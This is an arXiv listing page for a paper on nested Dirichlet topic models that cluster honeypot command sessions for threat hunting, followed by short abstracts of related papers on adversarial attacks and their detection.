Nested Dirichlet models for unsupervised attack pattern detection in honeypot data
- URL: http://arxiv.org/abs/2301.02505v3
- Date: Sun, 22 Sep 2024 21:05:36 GMT
- Title: Nested Dirichlet models for unsupervised attack pattern detection in honeypot data
- Authors: Francesco Sanna Passino, Anastasia Mantziou, Daniyar Ghani, Philip Thiede, Ross Bevington, Nicholas A. Heard,
- Abstract summary: Clustering attacks appearing to share a common intent is very valuable to threat-hunting experts.
This article explores Dirichlet distribution topic models for clustering terminal session commands collected from honeypots.
The main practical implications of clustering the sessions are two-fold: finding similar groups of attacks, and identifying outliers.
- Score: 0.0
- License: http://creativecommons.org/licenses/by/4.0/
- Abstract: Cyber-systems are under near-constant threat from intrusion attempts. Attacks types vary, but each attempt typically has a specific underlying intent, and the perpetrators are typically groups of individuals with similar objectives. Clustering attacks appearing to share a common intent is very valuable to threat-hunting experts. This article explores Dirichlet distribution topic models for clustering terminal session commands collected from honeypots, which are special network hosts designed to entice malicious attackers. The main practical implications of clustering the sessions are two-fold: finding similar groups of attacks, and identifying outliers. A range of statistical models are considered, adapted to the structures of command-line syntax. In particular, concepts of primary and secondary topics, and then session-level and command-level topics, are introduced into the models to improve interpretability. The proposed methods are further extended in a Bayesian nonparametric fashion to allow unboundedness in the vocabulary size and the number of latent intents. The methods are shown to discover an unusual MIRAI variant which attempts to take over existing cryptocurrency coin-mining infrastructure, not detected by traditional topic-modelling approaches.
Related papers
- BoBa: Boosting Backdoor Detection through Data Distribution Inference in Federated Learning [26.714674251814586]
Federated learning is susceptible to poisoning attacks due to its decentralized nature.
We propose a novel distribution-aware anomaly detection mechanism, BoBa, to address this problem.
arXiv Detail & Related papers (2024-07-12T19:38:42Z) - Ensemble-based Blackbox Attacks on Dense Prediction [16.267479602370543]
We show that a carefully designed ensemble can create effective attacks for a number of victim models.
In particular, we show that normalization of the weights for individual models plays a critical role in the success of the attacks.
Our proposed method can also generate a single perturbation that can fool multiple blackbox detection and segmentation models simultaneously.
arXiv Detail & Related papers (2023-03-25T00:08:03Z) - On the Robustness of Deep Clustering Models: Adversarial Attacks and
Defenses [14.951655356042947]
Clustering models constitute a class of unsupervised machine learning methods which are used in a number of application pipelines.
We propose a blackbox attack using Generative Adversarial Networks (GANs) where the adversary does not know which deep clustering model is being used.
We analyze our attack against multiple state-of-the-art deep clustering models and real-world datasets, and find that it is highly successful.
arXiv Detail & Related papers (2022-10-04T22:32:02Z) - Towards A Conceptually Simple Defensive Approach for Few-shot
classifiers Against Adversarial Support Samples [107.38834819682315]
We study a conceptually simple approach to defend few-shot classifiers against adversarial attacks.
We propose a simple attack-agnostic detection method, using the concept of self-similarity and filtering.
Our evaluation on the miniImagenet (MI) and CUB datasets exhibit good attack detection performance.
arXiv Detail & Related papers (2021-10-24T05:46:03Z) - Attack to Fool and Explain Deep Networks [59.97135687719244]
We counter-argue by providing evidence of human-meaningful patterns in adversarial perturbations.
Our major contribution is a novel pragmatic adversarial attack that is subsequently transformed into a tool to interpret the visual models.
arXiv Detail & Related papers (2021-06-20T03:07:36Z) - Towards Defending against Adversarial Examples via Attack-Invariant
Features [147.85346057241605]
Deep neural networks (DNNs) are vulnerable to adversarial noise.
adversarial robustness can be improved by exploiting adversarial examples.
Models trained on seen types of adversarial examples generally cannot generalize well to unseen types of adversarial examples.
arXiv Detail & Related papers (2021-06-09T12:49:54Z) - ExAD: An Ensemble Approach for Explanation-based Adversarial Detection [17.455233006559734]
We propose ExAD, a framework to detect adversarial examples using an ensemble of explanation techniques.
We evaluate our approach using six state-of-the-art adversarial attacks on three image datasets.
arXiv Detail & Related papers (2021-03-22T00:53:07Z) - Hidden Backdoor Attack against Semantic Segmentation Models [60.0327238844584]
The emphbackdoor attack intends to embed hidden backdoors in deep neural networks (DNNs) by poisoning training data.
We propose a novel attack paradigm, the emphfine-grained attack, where we treat the target label from the object-level instead of the image-level.
Experiments show that the proposed methods can successfully attack semantic segmentation models by poisoning only a small proportion of training data.
arXiv Detail & Related papers (2021-03-06T05:50:29Z) - Learning to Separate Clusters of Adversarial Representations for Robust
Adversarial Detection [50.03939695025513]
We propose a new probabilistic adversarial detector motivated by a recently introduced non-robust feature.
In this paper, we consider the non-robust features as a common property of adversarial examples, and we deduce it is possible to find a cluster in representation space corresponding to the property.
This idea leads us to probability estimate distribution of adversarial representations in a separate cluster, and leverage the distribution for a likelihood based adversarial detector.
arXiv Detail & Related papers (2020-12-07T07:21:18Z) - Adversarial Attack and Defense of Structured Prediction Models [58.49290114755019]
In this paper, we investigate attacks and defenses for structured prediction tasks in NLP.
The structured output of structured prediction models is sensitive to small perturbations in the input.
We propose a novel and unified framework that learns to attack a structured prediction model using a sequence-to-sequence model.
arXiv Detail & Related papers (2020-10-04T15:54:03Z) - Gradient-based adversarial attacks on categorical sequence models via
traversing an embedded world [11.711134497239332]
We consider adversarial attacks on deep learning models with categorical sequences.
We handle these challenges using two black-box adversarial attacks.
Results for money transactions, medical fraud, and NLP datasets suggest that proposed methods generate reasonable adversarial sequences.
arXiv Detail & Related papers (2020-03-09T14:31:36Z)
This list is automatically generated from the titles and abstracts of the papers in this site.
This site does not guarantee the quality of this site (including all information) and is not responsible for any consequences.